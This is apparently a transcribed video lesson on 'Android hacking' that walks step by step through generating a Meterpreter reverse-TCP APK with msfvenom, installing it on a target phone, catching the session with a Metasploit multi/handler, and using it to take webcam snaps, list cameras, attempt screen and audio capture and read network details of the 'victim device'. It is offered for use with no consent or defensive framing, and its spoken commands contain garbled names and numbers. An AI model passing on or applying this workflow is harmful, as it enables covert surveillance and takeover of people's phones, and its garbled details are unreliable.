So hello guys, welcome back to this new session of Android hacking. This is the first session of Android hacking and we'll just see how to hack the Android with the various kind of malware payloads and the viruses, and getting the access of the Android device and checking its web cameras, taking screenshot and using Metasploit and the various kind of tools and scripts which I have provided to you, like rats and fat rats. So let's see practically, and we will not discuss so much about the theoretical behind this. We'll just do the practicals. So let's get started. So first of all, you have to just open up your terminal and give a like command related to MS Metasploit, that is the MSF Venom. So I'll just adjust the screen and check it out. The command, that is the MSF Venom. Why the keyboard is not working? Just a second. That's it. MSF Venom -p. P is for payload, and then Android, then slash meterspeeder and slash reverse underscore TCP, and set the L host 192.168.0.107. L host means the IP address of your device. So my IP address of Ethernet, that is 192.168.0.107, and I will just type it here. And the L port is anything default, the 444888111, like 4 times 1, 4 times 8, that is the faster. And then -o for the output, and then name of the APK, like android.apk, and just you can see it is generated here in the root directory. Just paste that or install that into your Android device. There is multiple method, so you can install. So Metasploit console, MSF console, just it will start in few minutes. The second I adjust the screen. And you can see Metasploit has been started, and this is the new one, just recently updated. And there is a view of like a rabbit, something, okay, saying knock knock knock. There are multiple like images there whenever you start it new. So just give the command set android slash meterpreter slash reverse underscore TCP, and then hit the enter button. So just give the command here, set set L host host equals, don't give equals to 192.168.0.107, and set L port 444 and hit the enter and exploit. It is taking a lot of time. I'll just fast forward the video. Yeah, right. So okay, there was the no issue with the version of this Metasploit, and I have just updated the version. And if you have any problem in your Metasploit, you can contact me or you can just DM in the group. So I will try to fix it and give the commands related to the problem. And just see, I have just updated and opened the new session of MSF console. The step for the payload creation was the same. That only payload we had generated, that only we are going to use, not other. Just only MSF console we are going to see. So let's see. So type in your MSF console and just it will start within the few seconds. So MSF console has been started successfully. So just give the commands right here for a few seconds till the MSF use multi/handler and hit the enter button, and then type in the next command, that was the set payload slash android slash interpreter METERPRATER slash reverse underscore TCP. So, and hit the enter button after this, and you can see the payload has been set for the Android and then interpreter connection on, with the reverse TCP connection. So set the L host 192.168.0.107. So do not use this L host in your case. You should just check the your IP address from the ifconfig. So L port 144, and then type the command that is exploit, and the session will start. exploit and hit the enter button, so will start soon. So the started reverse TCP handler on 192.168.0.0.000 on the port 444, and it has successfully started the session on the victim device. And you can see the commands here, and there are some core commands. I don't know why I'm not seeing the more commands here. Like there are so many commands related to like date, getting the message, reading the messages, read the record calls and webcams. I don't know why I'm not seeing. Just type in hyphen commands, like here are some bg kill, like background kill, and like bg list. Just type in the command like help hyphen help, and there's a error, so give double hyphen help. I don't know why it is giving so many errors. So give date command, so it is also giving an error again. So check the other command, that is sys info, and hit the enter button. So it is not giving me system information also. So there is the missing of the load script PD. So it is given here. So just copy paste this there, paste it. Oh, just L is missing, L, and it is successfully examination of this. So it is working now here, all the commands. So I will just type in the help command here to get. So this is the OS architecture and like help, and this is the all the commands which were missing in the previous before the giving that command there. So these are the command like background, and these all the things like check some values, mkdir, upload the file or any payload again, and open the change directory. This is the pwd ifconfig and shell sys info, and this is the screenshot and like screen record mic, webcam chat, webcam list, and webcam snaps and webcam streams. You can play audio or waveform audio file, and there just give the command like screen shot. Oh, my mobile was just locked. Hosted in the app without the user interface default. Okay. So there is the not permission for the debug code. So just type in the another. We will try something like, we'll try some webcam snap or what. So we'll just type webcam underscore stream, and let's see it is streaming or not. I don't know why it is not streaming right now here. I think it's for just security reasons for the Android 10. So we will try these things in the next session, because we will try the rats, because rat is the best for malware creation or payload creation. So we'll try the another command like here. So you can see in the where is the root directory. So go to the root directory. Where is it? Yes, okay, it is here. So You can see the HTML something array file is there, hxv something. You can check it from here, like webcam stream of that IP. So it is not working right now. And just give the other one, that is webcam snap snap. And we have got some snap, like this is the keyboard. I have kept my mobile on the keyboard. So just webcam snap again. You can see the screen. I have just picked up this mobile to the screen, camera to the screen. So I don't know why the clarity is so poor in this. See, now you can see I will change the direction of camera. Wow, it is so alternative, tilted like. So we can list the webcam like webcam underscore list. So you can see the list of webcam, like there are two, front and back. So just type 2, it is not working. This is not the proper command. Just type the front camera and webcam stream snap. So it is not working. So we will take the screen share underscore screen share. So it is also not working right now here. So you can just see the another commands and just type in here, like there are some IP config. So it is taking a lot of time. Let me see for some another commands it is there or not. There are so many commands, you can get just confused. So you can try all these commands and see. Just press Control C, Control X, and Control X was there, the key for the, then type ifconfig config and hit the enter button. You can see the ifconfig information right here. So this is the IP and the net mask and all the things. Just type the IP config now. So you can see the IP config information. So take the snap. It is not working. So you can try these all the commands, and we will see the next session about the rats and other payload creation tools like lemon and all the things. So till that, take care and bye.